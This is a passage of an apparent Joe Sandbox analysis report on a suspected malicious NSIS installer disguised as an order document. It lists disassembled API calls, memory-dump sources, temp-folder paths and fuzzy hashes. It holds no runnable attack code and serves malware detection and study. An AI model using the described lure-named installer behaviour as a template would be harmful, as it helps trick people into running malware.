                                                  • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A5A
                                                  • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A6D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2415730008.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2415714170.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415746623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415876833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                  • String ID:
                                                  • API String ID: 2667972263-0
                                                  • Opcode ID: 99a72b25e835b2ea7940c93163da3ca2f710589d23dcac0e6d207047e8163098
                                                  • Instruction ID: 349357d0e6511a5e46fd8e19636faeb724d9b15f10a4c99f70335ec2520be7da
                                                  • Opcode Fuzzy Hash: 99a72b25e835b2ea7940c93163da3ca2f710589d23dcac0e6d207047e8163098
                                                  • Instruction Fuzzy Hash: 2731B171D00124BBCF21AFA5DD89D9E7E79AF44364F14023AF415762E1CB794D418F68
                                                  APIs
                                                  • lstrlenW.KERNEL32(00422F48,00422F48,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F6F
                                                  • wsprintfW.USER32 ref: 00404F78
                                                  • SetDlgItemTextW.USER32(?,00422F48), ref: 00404F8B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2415730008.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2415714170.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415746623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415876833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: ItemTextlstrlenwsprintf
                                                  • String ID: %u.%u%s%s$H/B
                                                  • API String ID: 3540041739-2222257793
                                                  • Opcode ID: 701484786e9e788ccce1f8e608fe17be4446b7c9895a13b6126df495f4584910
                                                  • Instruction ID: d50fdcff321319429c488fc01686433ffa638a32cb0890ada2b0e386a1fa8516
                                                  • Opcode Fuzzy Hash: 701484786e9e788ccce1f8e608fe17be4446b7c9895a13b6126df495f4584910
                                                  • Instruction Fuzzy Hash: 8B11A873A0412837DB00656D9D45E9E369C9B85374F154637FA26F31D1E979CC2182E8
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2450202966.0000000074331000.00000020.00000001.01000000.00000004.sdmp, Offset: 74330000, based on PE: true
                                                  • Associated: 00000000.00000002.2450137817.0000000074330000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.2450226719.0000000074334000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.2450276795.0000000074336000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_74330000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: FreeGlobal
                                                  • String ID:
                                                  • API String ID: 2979337801-0
                                                  • Opcode ID: 213f03514f37de65771ee8110c3cd704bbadd8cfdb153605c2c5d6b351dd2b22
                                                  • Instruction ID: 002b595e16f24438b366fb5a698700276e07519a6375f3cd01d185d649482404
                                                  • Opcode Fuzzy Hash: 213f03514f37de65771ee8110c3cd704bbadd8cfdb153605c2c5d6b351dd2b22
                                                  • Instruction Fuzzy Hash: 3951DA32E00518AADF129FA5C4405ADBBBAEF84315FD981DDD40EF3218F771AB4687A1
                                                  APIs
                                                  • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F22
                                                  • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F6E
                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F77
                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F8E
                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F99
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2415730008.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2415714170.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415746623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415876833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: CloseEnum$DeleteValue
                                                  • String ID:
                                                  • API String ID: 1354259210-0
                                                  • Opcode ID: b11fc5b6ae31e3f7bcdb9db3b4e616a20ad73eae00ded2b204568f86272eb2db
                                                  • Instruction ID: 5e325e4eb8c599eaadb2b1545cb8ec7488c9788084a271734582f96bfbf33a22
                                                  • Opcode Fuzzy Hash: b11fc5b6ae31e3f7bcdb9db3b4e616a20ad73eae00ded2b204568f86272eb2db
                                                  • Instruction Fuzzy Hash: FA213D7150010ABFEF129F90CE89EEF7B7DEB54388F110076B909B11E0D7759E54AA64
                                                  APIs
                                                  • GetDlgItem.USER32(?,?), ref: 00401DBF
                                                  • GetClientRect.USER32(?,?), ref: 00401E0A
                                                  • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E3A
                                                  • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E4E
                                                  • DeleteObject.GDI32(00000000), ref: 00401E5E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2415730008.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2415714170.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415746623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415876833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                  • String ID:
                                                  • API String ID: 1849352358-0
                                                  • Opcode ID: bd4e520b8cc5a1f7d7462dde4cdf2bafadf22cf4d53fc2066ec95edb4c3fdfff
                                                  • Instruction ID: 9dfadece7afb1d036d9df0696a088785edc369755c046bee68b18a74b307b48a
                                                  • Opcode Fuzzy Hash: bd4e520b8cc5a1f7d7462dde4cdf2bafadf22cf4d53fc2066ec95edb4c3fdfff
                                                  • Instruction Fuzzy Hash: DC213B72900119AFCF05DF98DE45AEEBBB5EB08300F14003AF945F62A0D7349D81DB98
                                                  APIs
                                                  • GetDC.USER32(?), ref: 00401E76
                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E90
                                                  • MulDiv.KERNEL32(00000000,00000000), ref: 00401E98
                                                  • ReleaseDC.USER32(?,00000000), ref: 00401EA9
                                                  • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401EF8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2415730008.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2415714170.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415746623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415876833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: CapsCreateDeviceFontIndirectRelease
                                                  • String ID:
                                                  • API String ID: 3808545654-0
                                                  • Opcode ID: e7871214ef899597a5c21e8ed64a158595def24cf366e312614ef02057251c7c
                                                  • Instruction ID: e238c2cdee3483520897b3d1e8694375d24364cfb31141c1d88cf39a281bb876
                                                  • Opcode Fuzzy Hash: e7871214ef899597a5c21e8ed64a158595def24cf366e312614ef02057251c7c
                                                  • Instruction Fuzzy Hash: 9D018871904250EFE7005BB4EE99BDD3FB4AF55301F20897AF142B61E2C6B904459BED
                                                  APIs
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,743322D8,?,00000808), ref: 743316D5
                                                  • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,743322D8,?,00000808), ref: 743316DC
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,743322D8,?,00000808), ref: 743316F0
                                                  • GetProcAddress.KERNEL32(743322D8,00000000), ref: 743316F7
                                                  • GlobalFree.KERNEL32(00000000), ref: 74331700
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2450202966.0000000074331000.00000020.00000001.01000000.00000004.sdmp, Offset: 74330000, based on PE: true
                                                  • Associated: 00000000.00000002.2450137817.0000000074330000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.2450226719.0000000074334000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.2450276795.0000000074336000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_74330000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                  • String ID:
                                                  • API String ID: 1148316912-0
                                                  • Opcode ID: 2e5cde91cf71f1d9bdbfaa999ab8e0b1ef56cb5a66690dd9c7ca57ab6b647938
                                                  • Instruction ID: a3951ac2532411a7f29d32c6338d1e21087a552053f5104d4ed19cdb452268ac
                                                  • Opcode Fuzzy Hash: 2e5cde91cf71f1d9bdbfaa999ab8e0b1ef56cb5a66690dd9c7ca57ab6b647938
                                                  • Instruction Fuzzy Hash: D8F0F8733561387BA62017A79C48DEBBE9CEF9B2F5B210215F6289219186654C0197F1
                                                  APIs
                                                  • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CD8
                                                  • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CF0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2415730008.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2415714170.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415746623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415876833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Timeout
                                                  • String ID: !
                                                  • API String ID: 1777923405-2657877971
                                                  • Opcode ID: 7ad168aabce29fd4aea1c4775643c0a159d1592a8197a50a1d283e8c160106aa
                                                  • Instruction ID: 990765c93fade27e2bb35c4ad61bbd9c2d50a24465aba9d794b4eebee5297a47
                                                  • Opcode Fuzzy Hash: 7ad168aabce29fd4aea1c4775643c0a159d1592a8197a50a1d283e8c160106aa
                                                  • Instruction Fuzzy Hash: 30217E7191421AAEEB05AFA4D94AAFE7BB0EF44304F10453EF505B61D0D7B88941DB98
                                                  APIs
                                                  • CharNextW.USER32(?,?,C:\Users\user~1\AppData\Local\Temp\nszD14F.tmp,?,00406090,C:\Users\user~1\AppData\Local\Temp\nszD14F.tmp,C:\Users\user~1\AppData\Local\Temp\nszD14F.tmp,771B3420,?,771B2EE0,00405DCE,?,771B3420,771B2EE0,"C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe"), ref: 0040602A
                                                  • CharNextW.USER32(00000000), ref: 0040602F
                                                  • CharNextW.USER32(00000000), ref: 00406047
                                                  Strings
                                                  • C:\Users\user~1\AppData\Local\Temp\nszD14F.tmp, xrefs: 0040601D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2415730008.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2415714170.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415746623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415876833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: CharNext
                                                  • String ID: C:\Users\user~1\AppData\Local\Temp\nszD14F.tmp
                                                  • API String ID: 3213498283-2967713064
                                                  • Opcode ID: fbda1c126528e77f8eb1d19cbf263a4f79599cb979c26f3e0093e3aefe43dd94
                                                  • Instruction ID: 37941c8e81507efb3cd3a011d4506580e18aa69eefbcae33377864b38d05d7c2
                                                  • Opcode Fuzzy Hash: fbda1c126528e77f8eb1d19cbf263a4f79599cb979c26f3e0093e3aefe43dd94
                                                  • Instruction Fuzzy Hash: 83F0F061D8061199DA31F6584C40E7766BCEB54360B06803BEA02B32C1D7BC88E182DA
                                                  APIs
                                                  • lstrlenW.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\,00403652,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,0040394F,?,00000008,0000000A,0000000C), ref: 00405F77
                                                  • CharPrevW.USER32(?,00000000,?,C:\Users\user~1\AppData\Local\Temp\,00403652,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,0040394F,?,00000008,0000000A,0000000C), ref: 00405F81
                                                  • lstrcatW.KERNEL32(?,0040A014,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405F93
                                                  Strings
                                                  • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405F71
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2415730008.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2415714170.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415746623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415876833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: CharPrevlstrcatlstrlen
                                                  • String ID: C:\Users\user~1\AppData\Local\Temp\
                                                  • API String ID: 2659869361-2382934351
                                                  • Opcode ID: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                  • Instruction ID: 335bc096d8d08ccdb4617666140afd44cda2f442d884a3fcf06d2b2a94fa9456
                                                  • Opcode Fuzzy Hash: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                  • Instruction Fuzzy Hash: 42D0A731101A34EAC2117B448C04CDF629C9F46344341483BF101B31A1CB7D5DA287FD
                                                  APIs
                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 74331171
                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 743311E3
                                                  • GlobalFree.KERNEL32 ref: 7433124A
                                                  • GlobalFree.KERNEL32(?), ref: 7433129B
                                                  • GlobalFree.KERNEL32(00000000), ref: 743312B1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2450202966.0000000074331000.00000020.00000001.01000000.00000004.sdmp, Offset: 74330000, based on PE: true
                                                  • Associated: 00000000.00000002.2450137817.0000000074330000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.2450226719.0000000074334000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.2450276795.0000000074336000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_74330000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: Global$Free$Alloc
                                                  • String ID:
                                                  • API String ID: 1780285237-0
                                                  • Opcode ID: 190f11b7c1e4d84280efe4ad5771f98d1182f86df2bb1c3958766bb774e0f20b
                                                  • Instruction ID: 1b340efb845b18150290c63b089bb7dd1cb0bb630a6cc17bfcc44dc585778a06
                                                  • Opcode Fuzzy Hash: 190f11b7c1e4d84280efe4ad5771f98d1182f86df2bb1c3958766bb774e0f20b
                                                  • Instruction Fuzzy Hash: 9C518DB6A10201DFEB00CF69C944AA67BBCFF48315F95412AF94EDB211EB35DA41CB50
                                                  APIs
                                                  • lstrlenA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\nszD14F.tmp\System.dll), ref: 004026BA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2415730008.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2415714170.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415746623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415876833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: lstrlen
                                                  • String ID: C:\Users\user~1\AppData\Local\Temp\nszD14F.tmp$C:\Users\user~1\AppData\Local\Temp\nszD14F.tmp\System.dll
                                                  • API String ID: 1659193697-994515240
                                                  • Opcode ID: 0b41287631d18e2d28a56846eef1e8605d4441d913272003cd6f8d0be4e33a07
                                                  • Instruction ID: 3a980f7409dbeac528cd7030d6b505637954cb723df09773b9ac7431f40d283a
                                                  • Opcode Fuzzy Hash: 0b41287631d18e2d28a56846eef1e8605d4441d913272003cd6f8d0be4e33a07
                                                  • Instruction Fuzzy Hash: BD11EB72B00206A7CB00BBB18E4AA9E77659F50758F21443FF502B61D0DAFD8991635E
                                                  APIs
                                                  • CloseHandle.KERNEL32(000002E0,C:\Users\user~1\AppData\Local\Temp\,00403BB5,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403C94
                                                  • CloseHandle.KERNEL32(000002E4,C:\Users\user~1\AppData\Local\Temp\,00403BB5,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403CA8
                                                  Strings
                                                  • C:\Users\user~1\AppData\Local\Temp\nszD14F.tmp, xrefs: 00403CB8
                                                  • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00403C87
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2415730008.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2415714170.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415746623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415876833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: CloseHandle
                                                  • String ID: C:\Users\user~1\AppData\Local\Temp\$C:\Users\user~1\AppData\Local\Temp\nszD14F.tmp
                                                  • API String ID: 2962429428-1943649435
                                                  • Opcode ID: aee73ed6a062803200b229e34675cefdb9ab84dda1d90898f0442dcc956d8ee4
                                                  • Instruction ID: 6bfdaf564fb6f4d857381f61ee43f4b3e7b9b57b480fcef53b70eb5bee5fd527
                                                  • Opcode Fuzzy Hash: aee73ed6a062803200b229e34675cefdb9ab84dda1d90898f0442dcc956d8ee4
                                                  • Instruction Fuzzy Hash: ADE0863150471896D5346F7CAF4D9853B185F413357258327F078F20F0C738D95A5AAD
                                                  APIs
                                                    • Part of subcall function 004066A2: lstrcpynW.KERNEL32(?,?,00000400,004037D7,Caecias Setup,NSIS Error,?,00000008,0000000A,0000000C), ref: 004066AF
                                                    • Part of subcall function 0040601C: CharNextW.USER32(?,?,C:\Users\user~1\AppData\Local\Temp\nszD14F.tmp,?,00406090,C:\Users\user~1\AppData\Local\Temp\nszD14F.tmp,C:\Users\user~1\AppData\Local\Temp\nszD14F.tmp,771B3420,?,771B2EE0,00405DCE,?,771B3420,771B2EE0,"C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe"), ref: 0040602A
                                                    • Part of subcall function 0040601C: CharNextW.USER32(00000000), ref: 0040602F
                                                    • Part of subcall function 0040601C: CharNextW.USER32(00000000), ref: 00406047
